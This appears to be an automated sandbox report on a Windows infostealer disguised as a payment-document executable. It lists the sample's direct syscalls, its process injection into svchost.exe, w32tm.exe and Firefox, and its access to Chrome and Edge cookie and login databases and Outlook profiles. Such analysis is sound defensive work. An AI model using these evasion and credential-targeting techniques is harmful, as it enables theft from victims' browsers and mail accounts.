                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]1_2_03669660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03669660 mov eax, dword ptr fs:[00000030h]1_2_03669660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F626 mov eax, dword ptr fs:[00000030h]1_2_0362F626
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03705636 mov eax, dword ptr fs:[00000030h]1_2_03705636
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03661607 mov eax, dword ptr fs:[00000030h]1_2_03661607
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366F603 mov eax, dword ptr fs:[00000030h]1_2_0366F603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]1_2_03633616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03633616 mov eax, dword ptr fs:[00000030h]1_2_03633616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C36EE mov eax, dword ptr fs:[00000030h]1_2_036C36EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]1_2_0365D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D6E0 mov eax, dword ptr fs:[00000030h]1_2_0365D6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ED6F0 mov eax, dword ptr fs:[00000030h]1_2_036ED6F0
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00940B62
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00912622
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0090083F
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009009D5 SetUnhandledExceptionFilter,0_2_009009D5
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00900C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\w32tm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeThread register set: target process: 7976Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeThread APC queued: target process: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AE8008Jump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00941201
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00922BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00922BA5
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094B226 SendInput,keybd_event,0_2_0094B226
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_009622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009622DA
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe"Jump to behavior
                Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00940B62
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00941663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00941663
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: vtTdsKSTqQr.exe, 00000002.00000000.1806170638.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000002.00000002.4152801143.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000000.1963336147.0000000001070000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00900698 cpuid 0_2_00900698
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00958195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00958195
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0093D27A GetUserNameW,0_2_0093D27A
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0091BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0091BB6F
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_81
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_XP
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_XPe
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_VISTA
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_7
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00961204
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00961806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
